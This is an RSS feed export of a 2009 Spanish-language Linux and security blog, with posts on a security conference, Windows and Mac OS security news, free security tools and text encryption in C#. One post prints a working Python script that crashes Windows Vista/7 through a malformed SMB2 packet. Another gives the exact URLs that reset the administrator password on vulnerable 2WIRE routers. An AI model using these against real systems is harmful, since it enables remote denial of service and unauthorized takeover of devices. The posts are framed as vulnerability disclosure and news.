<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Linux, computación y más... &#187; Seguridad</title>
	<atom:link href="http://antoniomtz.org/category/seguridad/feed/" rel="self" type="application/rss+xml" />
	<link>http://antoniomtz.org</link>
	<description></description>
	<lastBuildDate>Wed, 09 May 2012 00:14:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Conferencia &quot;Seguridad Informática&quot; en el Tecnológico de la Laguna</title>
		<link>http://antoniomtz.org/2009/11/conferencia-seguridad-informatica-en-el-tecnologico-de-la-laguna/</link>
		<comments>http://antoniomtz.org/2009/11/conferencia-seguridad-informatica-en-el-tecnologico-de-la-laguna/#comments</comments>
		<pubDate>Sat, 21 Nov 2009 23:13:06 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[Exposiciones]]></category>
		<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[conferencias]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[software libre]]></category>

		<guid isPermaLink="false">http://www.antoniomtz.org/?p=506</guid>
		<description><![CDATA[El pasado Jueves 19 de Noviembre el 2009, fuimos coordialmente invitados al Foro Académico del Instituto Tecnológico de la Laguna, en dónde tuvimos participación con una conferencia/taller de &#8220;Seguridad Informática&#8221; y un taller de Instalación y Hardening en servidores Linux. La conferencia de seguridad informática estaba planeada para 1 hr. sin embargo, gracias a la [...]]]></description>
			<content:encoded><![CDATA[<p>El pasado Jueves 19 de Noviembre el 2009, fuimos coordialmente invitados al Foro Académico del Instituto Tecnológico de la Laguna, en dónde tuvimos participación con una conferencia/taller de &#8220;Seguridad Informática&#8221; y un taller de Instalación y Hardening en servidores Linux.</p>
<p>La conferencia de seguridad informática estaba planeada para 1 hr. sin embargo, gracias a la aceptación e interés de los alumnos, se extendio hasta 1 hr con 45 min. aproximádamente.</p>
<p>En la conferencia se habló sobre la seguridad informática Física, Lógica, amenazas humanas (Hackers, Crackers, Lamers, Script Kiddies, etc&#8230;), y se hizo demostraciones de vulnerablidades de SQL Injection, XSS, exploits de algunos sitios en producción. También se hizo desmostración de técnicas como Scanning, DNS Spoof, Sniffing y Phishing.</p>
<p><img src="http://farm3.static.flickr.com/2758/4122549621_44eceac037.jpg"><br />
<img src="http://farm3.static.flickr.com/2601/4122549635_e15a2cd759_o.jpg"><br />
<img src="http://farm3.static.flickr.com/2778/4122549673_cd9d0fb221.jpg"><br />
<img src="http://farm3.static.flickr.com/2575/4122549665_d57bafd5fb.jpg"></p>
<p>Les dejo la presentación para su descarga: <a href="http://www.antoniomtz.org/manuales/presentacion-seguridad-tec.pdf">Presentación Seguridad Informática</a></p>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/11/conferencia-seguridad-informatica-en-el-tecnologico-de-la-laguna/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Windows 7 tiene su primer parche antes de su salida</title>
		<link>http://antoniomtz.org/2009/10/windows-7-tiene-su-primer-parche-antes-de-su-salida/</link>
		<comments>http://antoniomtz.org/2009/10/windows-7-tiene-su-primer-parche-antes-de-su-salida/#comments</comments>
		<pubDate>Mon, 19 Oct 2009 20:37:28 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.antoniomtz.org/?p=471</guid>
		<description><![CDATA[Todavía no aparece oficialmente, pero la versión final de Windows 7 ya tiene su primer parche. La semana pasada, Microsoft arregló nueve vulnerabilidades, de las que cinco fueron consideradas “críticas”. Así que si el jueves piensas cambiarte al nuevo sistema operativo de Microsoft, ya necesitarás bajar la primera actualización de seguridad. Microsoft descubrió 34 fallas [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://i808.photobucket.com/albums/zz10/antoniomtz86/win7parche.jpg"></center></p>
<p>Todavía no aparece oficialmente, pero la versión final de <strong>Windows 7</strong> ya tiene su primer parche. La semana pasada, <strong>Microsoft</strong> arregló nueve vulnerabilidades, de las que cinco fueron consideradas “críticas”.</p>
<p>Así que si el jueves piensas cambiarte al nuevo sistema operativo de Microsoft, ya necesitarás bajar la primera actualización de seguridad.</p>
<p>Microsoft descubrió 34 fallas que afectaban a Windows XP, Vista y la versión final de Windows 7, que intentó arreglar rápidamente. Pese a que Windows 7 presentó problemas, la cantidad de fallas es menor a lo que registraron XP (24 de 34, con 18 de ellas marcadas como críticas) y Vista (19 de 34, 11 críticas).</p>
<p>De acuerdo a los expertos, la presencia de fallas en Windows 7 se debería al uso de código reciclado heredado de sus antecesores. Por lo menos éstas ya están solucionadas, aunque no se descarta que una vez que aparezca, se descubran otras más.</p>
<p>Vía <a href="http://news.idg.no/cw/art.cfm?id=6C9A9B1E-1A64-6A71-CE31A080914EC95C">Microsoft issues first Windows 7 patches</a></p>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/10/windows-7-tiene-su-primer-parche-antes-de-su-salida/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacklab Gulag</title>
		<link>http://antoniomtz.org/2009/10/hacklab-gulag/</link>
		<comments>http://antoniomtz.org/2009/10/hacklab-gulag/#comments</comments>
		<pubDate>Mon, 05 Oct 2009 16:41:47 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Gulag]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[software libre]]></category>

		<guid isPermaLink="false">http://www.antoniomtz.org/?p=450</guid>
		<description><![CDATA[El pasado Sábado 3 de Octubre del 2009, se llevó acabo un &#8220;HackLab&#8221; por parte del grupo GULAG. Se practicó la construcción de antenas, se probaron nuevos equipos y la virtualización con QEmu. Comida, hacks and beers =) antoniomtz: &#8220;A GnDx le gusta el pythoon&#8221;]]></description>
			<content:encoded><![CDATA[<p>El pasado Sábado 3 de Octubre del 2009, se llevó acabo un &#8220;HackLab&#8221; por parte del grupo <a href="http://www.gulag.org.mx">GULAG</a>. Se practicó la construcción de antenas, se probaron nuevos equipos y la virtualización con QEmu.</p>
<p><img src="http://farm3.static.flickr.com/2456/3981218551_8c3fecae4c.jpg"></p>
<p><img src="http://farm3.static.flickr.com/2524/3981979710_599f23c598.jpg"></p>
<p><img src="http://farm3.static.flickr.com/2598/3981980590_bcf84179ff.jpg"></p>
<p>Comida, hacks and beers =)</p>
<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/2G5QrQF3ABk&#038;hl=es&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/2G5QrQF3ABk&#038;hl=es&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>
<p>antoniomtz: &#8220;A <a href="http://www.gndx.org">GnDx</a> le gusta el pythoon&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/10/hacklab-gulag/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Snow Leopard es más inseguro que Windows 7</title>
		<link>http://antoniomtz.org/2009/09/snow-leopard-es-mas-inseguro-que-windows-7/</link>
		<comments>http://antoniomtz.org/2009/09/snow-leopard-es-mas-inseguro-que-windows-7/#comments</comments>
		<pubDate>Mon, 21 Sep 2009 19:56:13 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[Apple]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.antoniomtz.org/?p=418</guid>
		<description><![CDATA[Segun dailytech.com, algunos expertos en seguridad y reconocidos hackers alertan que el último Sistema Operativo presentado por la manzana blanca, Snow Leopard, es menos seguro que el próximo Sistema Operativo de Microsoft, Windows 7. Estas afirmaciones se basan en el hecho de que Snow Leopard trae desactivado por defecto el cortafuegos (aunque el usuario lo [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://antoniomtz.org/wp-content/uploads/2009/09/snow-leopardjpg.jpg" alt="snow-leopardjpg" title="snow-leopardjpg" width="300" height="292" class="aligncenter size-full wp-image-417" /></center></p>
<p>Segun <strong>dailytech.com</strong>, algunos expertos en seguridad y reconocidos hackers alertan que el último Sistema Operativo presentado por la manzana blanca, <strong>Snow Leopard</strong>, es menos seguro que el próximo Sistema Operativo de Microsoft,<strong> Windows 7</strong>.</p>
<p>Estas afirmaciones se basan en el hecho de que <strong>Snow Leopard</strong> trae desactivado por defecto el cortafuegos (aunque el usuario lo puede volver a activar), que las actualizaciones no sean totalmente automáticas y que Safari incluye un sistema antiphising muy débil.</p>
<p>A lo anterior se debe agregar el hecho de que Apple incluyó en Snow Leopard una versión de Adobe Flash que era vulnerable a ataques, aunque esto último fue solucionado con la primera actualización del Sistema Operativo.</p>
<p><strong>El reconocido hacker Charlie Miller</strong> ha criticado que Snow Leopard no incluya ninguna modificación relacionada con la forma como el sistema asigna la memoria disponible en forma aleatoria, una debilidad que ya era conocida en versiones anteriores de Mac OS y que en este último Sistema Operativo sigue igual. Es por esta razón que es mucho más fácil para los hackers realizar un ataque contra Snow Leopard que contra Windows 7.</p>
<p>Claro que no todo han sido críticas, porque Miller reconoce las mejoras de seguridad introducidas en QuickTime X (el que fue re-escrito completamente) y la efectiva implementación del sistema de prevención de ejecución de datos (DEP), un sistema que protege el uso de la memoria y que se encuentra integrado en Windows 7.</p>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/09/snow-leopard-es-mas-inseguro-que-windows-7/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows Vista / 7 SMB2.0 negotiate protocol request remote B.S.O.D.</title>
		<link>http://antoniomtz.org/2009/09/windows-vista-7-smb2-0-negotiate-protocol-request-remote-b-s-o-d/</link>
		<comments>http://antoniomtz.org/2009/09/windows-vista-7-smb2-0-negotiate-protocol-request-remote-b-s-o-d/#comments</comments>
		<pubDate>Fri, 11 Sep 2009 20:28:22 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.antoniomtz.org/?p=393</guid>
		<description><![CDATA[Vulnerabilidad encontrada en el procotolo SMB en windows vista y windows 7, con éste exploit el atacante puede congelar(crash) remotamente cualquiera de éstos 2 sistemas operativos. Solución? Por el momento no la hay, simplemente cerrar puertos del SMB. #!/usr/bin/python #When SMB2.0 recieve a "&#038;" char in the "Process Id High" SMB header field #it dies [...]]]></description>
			<content:encoded><![CDATA[<p>Vulnerabilidad encontrada en el <strong>procotolo SMB en windows vista y windows 7</strong>, con éste exploit el atacante puede congelar(crash) remotamente cualquiera de éstos 2 sistemas operativos.</p>
<h3>Solución?</h3>
<p>Por el momento no la hay, simplemente cerrar puertos del SMB.</p>
<pre name="code" class="python">
#!/usr/bin/python
#When SMB2.0 recieve a "&#038;" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 &#038; sub 0xc853
"\x00\x26"# Process ID High: --> =) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
</pre>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/09/windows-vista-7-smb2-0-negotiate-protocol-request-remote-b-s-o-d/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Grave vulnerabilidad de Autentificación en routers 2WIRE</title>
		<link>http://antoniomtz.org/2009/08/grave-vulnerabilidad-de-autentificacion-en-routers-2wire/</link>
		<comments>http://antoniomtz.org/2009/08/grave-vulnerabilidad-de-autentificacion-en-routers-2wire/#comments</comments>
		<pubDate>Tue, 25 Aug 2009 20:35:58 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.antoniomtz.org/?p=356</guid>
		<description><![CDATA[Ha sido publicada una vulnerabilidad de los routers 2WIRE en el cual puedes cambiar el password de Administrador si éste ya fué configurado. Los modelos vulnerables son: 2Wire 2701 Gateway 2Wire 1800HW 2Wire 1701HG Y los firmwares vulnerables: 5.29.51 3.17.5 3.7.1 Firmware NO VULNERABLE: 5.29.135.5 Para establecer una nueva contraseña si ésta ya fué establecida, [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://www.antoniomtz.org/wp-content/uploads/2009/08/2wire_4-300x300.jpg" alt="2wire_4" title="2wire_4" width="300" height="300" class="aligncenter size-medium wp-image-357" /></center></p>
<p>Ha sido publicada una vulnerabilidad de los <strong>routers 2WIRE</strong> en el cual puedes cambiar el password de Administrador si éste ya fué configurado.</p>
<p>Los modelos vulnerables son:</p>
<ul>
<li>2Wire 2701 Gateway
<li>2Wire 1800HW
<li>2Wire 1701HG
</ul>
<p>Y los firmwares vulnerables:</p>
<ul>
<li>5.29.51
<li>3.17.5
<li>3.7.1
</ul>
<p>Firmware <strong>NO VULNERABLE</strong>:<br />
5.29.135.5</p>
<p>Para establecer una nueva contraseña si ésta ya fué establecida, simplemente vamos a ésta dirección:</p>
<pre>

http://gateway.2wire.net?xslt?page=CD35_SETUP_01
</pre>
<p>Si quieres resetear el password:</p>
<pre>

http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&#038;password1=hkmhkmhkmhkmhkm

hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
kmhkmhkmhkmhkmhkmhkmhkm&#038;password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm
</pre>
<p><img src="http://antoniomtz.org/wp-content/uploads/2009/08/2wire.jpg" alt="2wire" title="2wire" width="518" height="605" class="aligncenter size-full wp-image-360" /></p>
<p>Descargar <a href="http://antoniomtz.org/wp-content/uploads/2009/08/2wire_CD35_Reset.ogv">video demostrativo</a>.</p>
<h3>Conclusión:</h3>
<p>Los problemas con los routers 2WIRE continuan , y ésto afecta a grandes compañias que utilizan éste tipo de aparatos, lo más recomendable es comprar otro tipo de router ó actualizar el firmware de nuestro router 2WIRE.</p>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/08/grave-vulnerabilidad-de-autentificacion-en-routers-2wire/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
<enclosure url="http://antoniomtz.org/wp-content/uploads/2009/08/2wire_CD35_Reset.ogv" length="1767011" type="video/ogg" />
		</item>
		<item>
		<title>Herramientas de seguridad libres</title>
		<link>http://antoniomtz.org/2009/08/herramientas-de-seguridad-libres/</link>
		<comments>http://antoniomtz.org/2009/08/herramientas-de-seguridad-libres/#comments</comments>
		<pubDate>Fri, 21 Aug 2009 16:18:22 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[Debian]]></category>
		<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[software libre]]></category>

		<guid isPermaLink="false">http://www.antoniomtz.org/?p=350</guid>
		<description><![CDATA[Aquí les traigo algunas de las herramientas de seguridad libres más populares sacadas de la lista de Top 100 Network Security Tools de insecure.org: Nessus: Es la herramienta de evaluación de vulnerabilidades para UNIX de mayor renombre. Nessus es el mejor escaner de vulnerabilidades &#8220;Open Source&#8221; que hay disponible en la red y el que [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.antoniomtz.org/wp-content/uploads/2009/08/trinity-nmapscreen-hd-crop-1200x728-300x182.jpg" alt="trinity-nmapscreen-hd-crop-1200x728" title="trinity-nmapscreen-hd-crop-1200x728" width="300" height="182" class="aligncenter size-medium wp-image-340" /></p>
<p>Aquí les traigo algunas de las herramientas de seguridad libres más populares sacadas de la lista de Top 100 Network Security Tools de insecure.org:</p>
<ul>
<li><a href="http://www.nessus.org/nessus/" rel="nofollow">Nessus</a>: Es la herramienta de evaluación de vulnerabilidades para UNIX de mayor renombre.
<p>Nessus es el mejor escaner de vulnerabilidades &#8220;Open Source&#8221; que hay disponible en la red y el que mejor funciona sobre UNIX. Se actualiza constantemente, con más de 11.000 plugins gratuitos (requiere registro y aceptar el EULA). Las características principales incluyen chequeos de seguridad remotos y locales (con autenticación) , una arquitectura cliente/servidor con un interfaz gráfico GTK (GIMP toolkit), y un Lenguaje de Scripting de Ataque Nessus (NASL) para escribir tus propios plugins o entender los existentes. Nessus 3 ahora es de código cerrado, pero es de coste gratuito a menos que desees los plugins más nuevos.</p>
<li><a href="http://www.wireshark.org/" rel="nofollow">Wireshark</a>: Esnifando el pegamento que mantiene unido Internet
<p>Wireshark (conocido hasta el verano del 2006 como Ethereal debido a un conflicto de marca registrada) es un fantástico analizador de protocolos de red &#8220;Open Source&#8221; para Unix y Windows. Permite que examines los datos de una red o de un archivo de captura almacenado en disco. Puedes visualizar directamente los datos de la captura, descendiendo en el nivel de detalle del paquete que necesitas. Wireshark tiene varias características de gran potencia, incluyendo un amplio lenguaje de filtrado de paquetes para su visualización y la capacidad de visualizar una sesión TCP reconstruida. También soporta cientos de protocolos y tipos de red. Incluye una versión en modo consola, como tcpdump, llamada tethereal.</p>
<p>Un consejo de seguridad, Ethereal ha sufrido docenas de vulnerabilidades explotables en remoto, así que mantenlo actualizado y se cuidadoso donde lo ejecutes si va a funcionar en redes poco seguras u hostiles (tales como conferencias de la seguridad).</p>
<li><a href="http://www.snort.org/" rel="nofollow">Snort</a>: El IDS de libre distribución  preferido por todo el mundo.
<p>Este ligero sistema de detección y prevención de intrusiones de red sobresale en el análisis y registro del tráfico de paquetes  sobre redes TCP/IP. A través del análisis del protocolo, buscando en su contenido, y de varios pre procesadores, Snort detecta miles de gusanos y virus, intentos de explotar vulnerabilidades, escaneos de puertos, y otros comportamientos sospechosos. Snort utiliza un lenguaje flexible basado en reglas (rules) para describir el tráfico que debe filtrar o permitir, y un motor modular de detección. También se pueden monitorizar las alertas de Snort mediante un interfaz web (Basic Analysis and Security Engine &#8211; BASE)</p>
<p>La libre distribuciñon de Snort lo hace ideal para trabajar en usuarios, pequeñas empresas, y otras redes. La empresa de su creador, SourceFire , ofrece una línea de productos complementarios con más características destinadas a nivel empresarial y actualizaciones de reglas en tiempo real. Ofrecen de forma gratuita (requiere registro) una actualización de las reglas con 5 días de retraso, y también puedes encontrar muchas reglas gratuitas muy buenas en el Bleeding Edge Snort</p>
<li><a href="http://netcat.sourceforge.net/" rel="nofollow">Netcat</a>: La navaja suiza de las redes<br />
Esta sencilla herramienta lee y escribe datos a través las conexiones de red usando los protocolos TCP o UDP. Está diseñada para ser una utilidad confiable de fácil manejo para el usuario final que pueda ser llamada directamente por otros programas y scripts.</p>
<p>Al mismo tiempo, es una gran herramienta para explorar y depurar los errores de una red, puesto que puede crear casi cualquier clase de conexión que necesites, incluyendo puertos que enlazan con conexiones entrantes. La  versión original de Netcat fue lanzada por Hobbit en 1995, pero no se ha mantenido a pesar de su inmenso renombre. A veces puede ser difícil encontrar nc110.tgz. La flexibilidad y la utilidad de esta herramienta han incitado a mucha otra gente a escribir otras implementaciones de Netcat &#8211; a menudo con las características modernas no encontradas en la original. Una de las más interesantes es Socat, que amplía Netcat para soportar muchos otros tipos de sockets, cifrado SSL, proxies SOCK, y muchos más. También existe Ncat de Chris Gibson, que ofrece aún más características mientras que es tan portable y compacto como el resto.</p>
<li><a href="http://www.eeye.com/html/Products/Retina/index.html" rel="nofollow">Retina</a>:  Escáner de vulnerabilidades comercial de eEye
<p>Como Nessus, la función de Retina es explorar todas las maquinas de una red e informar sobre cualquier vulnerabilidad encontrada. Fue escrita por eEye, quienes son buenos conocedores de las investigaciones de seguridad informática.</p>
<h3>Instalación</h3>
<p>En debian/Ubuntu , no hay mayores complicaciones:</p>
<pre>
# aptitude install nessus snort netcat
</pre>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/08/herramientas-de-seguridad-libres/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Twitter sufre un ataque DoS &#8211; Denial Of Service</title>
		<link>http://antoniomtz.org/2009/08/twitter-sufre-un-ataque-dos-denial-of-service/</link>
		<comments>http://antoniomtz.org/2009/08/twitter-sufre-un-ataque-dos-denial-of-service/#comments</comments>
		<pubDate>Fri, 07 Aug 2009 17:49:48 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[Noticias]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://www.antoniomtz.org/?p=315</guid>
		<description><![CDATA[Leyendo en el blog de Linuxman, me entero que twitter ha sufrido un ataque DoS y estuvo fuera de servicio por algunas horas, éstos son algunos de los mensajes de los administradores: We are defending against a denial-of-service attack, and will update status again shortly. Update: the site is back up, but we are continuing [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://antoniomtz.org/wp-content/uploads/2009/08/105279_matter.jpg" alt="105279_matter" title="105279_matter" width="260" height="150" class="aligncenter size-full wp-image-316" /></p>
<p>Leyendo en el blog de <a href="http://linuxman.blogsome.come">Linuxman</a>, me entero que twitter ha sufrido un ataque DoS y estuvo fuera de servicio por algunas horas, éstos son algunos de los mensajes de los administradores:</p>
<blockquote><p>
We are defending against a denial-of-service attack, and will update status again shortly.<br />
Update: the site is back up, but we are continuing to defend against and recover from this attack.
</p></blockquote>
<p>Pueden checar el status de twitter desde el <a href="http://status.twitter.com/">Twitter Status</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/08/twitter-sufre-un-ataque-dos-denial-of-service/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>iWepLite Liberado!</title>
		<link>http://antoniomtz.org/2009/07/iweplite-liberado/</link>
		<comments>http://antoniomtz.org/2009/07/iweplite-liberado/#comments</comments>
		<pubDate>Wed, 15 Jul 2009 22:31:47 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[iPhone]]></category>
		<category><![CDATA[Noticias]]></category>
		<category><![CDATA[Seguridad]]></category>

		<guid isPermaLink="false">http://localhost/wordpress2/?p=262</guid>
		<description><![CDATA[Buenas noticias, ha sido liberada la aplicación iWepLite para iPhone OS 3.0 con la cuál podemos desencriptar claves WEP de Access Points. Para poder instalarla, debemos agregar la siguiente URL en el source de cydia: wazowski.iespana.es/repo Cabe mencionar que la aplicación acaba de ser liberada por lo que tiene algunos bugs, según comentan en foros, [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://farm3.static.flickr.com/2441/3724210779_d3b3f1b405_o.jpg"></center><br />
Buenas noticias, ha sido liberada la aplicación <b>iWepLite para iPhone OS 3.0</b> con la cuál podemos desencriptar claves WEP de Access Points.</p>
<p>Para poder instalarla, debemos agregar la siguiente URL en el source de cydia:</p>
<pre>
wazowski.iespana.es/repo
</pre>
<p>Cabe mencionar que la aplicación acaba de ser liberada por lo que tiene algunos bugs, según comentan en foros, esa aplicación sólo funciona para españa, la verdad no entiendo porque si los routers aquí y en china son los mismos, pero bueno, probando la aplicación las redes que detectó fueron incomtatibles por lo que no he podido probarla bien.</p>
<p><center><img src="http://farm4.static.flickr.com/3463/3724211371_702280bb92_o.jpg"></center></p>
]]></content:encoded>
			<wfw:commentRss>http://antoniomtz.org/2009/07/iweplite-liberado/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Encriptación de Texto en C# con Mono</title>
		<link>http://antoniomtz.org/2009/07/encriptacion-de-texto-en-c-con-mono/</link>
		<comments>http://antoniomtz.org/2009/07/encriptacion-de-texto-en-c-con-mono/#comments</comments>
		<pubDate>Wed, 15 Jul 2009 07:19:38 +0000</pubDate>
		<dc:creator>antoniomtz</dc:creator>
				<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Mono]]></category>
		<category><![CDATA[Programación]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Tutoriales]]></category>
		<category><![CDATA[c#]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[software libre]]></category>

		<guid isPermaLink="false">http://localhost/wordpress2/?p=261</guid>
		<description><![CDATA[La encriptación en el área de seguridad es muy importante, y más aún en una aplicación a la hora de guardar contraseñas en una base de datos. Aquí les dejo un proyecto con el cuál podemos encriptar y desencriptar texto con la ayuda de algunas clases que se encuentran en .NET, me basé en ésta [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://www.antoniomtz.org/files/candado.jpg"></center></p>
<p>La encriptación en el área de seguridad es muy importante, y más aún en una aplicación a la hora de guardar contraseñas en una base de datos.</p>
<p>Aquí les dejo un proyecto con el cuál podemos encriptar y desencriptar texto con la ayuda de algunas clases que se encuentran en .NET, me basé en ésta página <a href="http://blogs.windowsclient.net/linkecubeko/archive/2009/05/01/como-cifrar-y-descifrar-texto-usando-c.aspx" rel="nofollow" target="_blank">Using System.Linkecubeko</a></p>
<p>Para comenzar utilizaremos los siguientes espacios de nombres:</p>
<pre>
using System.Text;
using System.Security.Cryptography;
</pre>
<p>Y con las siguientes clases:</p>
<p><b>MD5CryptoServiceProvider (Clase)</b></p>
<p>Calcula el valor de hash MD5 (Message-Digest Algorithm 5), de los datos de entrada utilizando la implementación proporcionada por el proveedor de servicios criptográfico (CSP). Esta clase no se puede heredar.</p>
<p><b>UTF8Encoding (Clase)</b></p>
<p>Representa una codificación UTF-8 de caracteres Unicode.</p>
<p><b>TripleDESCryptoServiceProvider (Clase)</b></p>
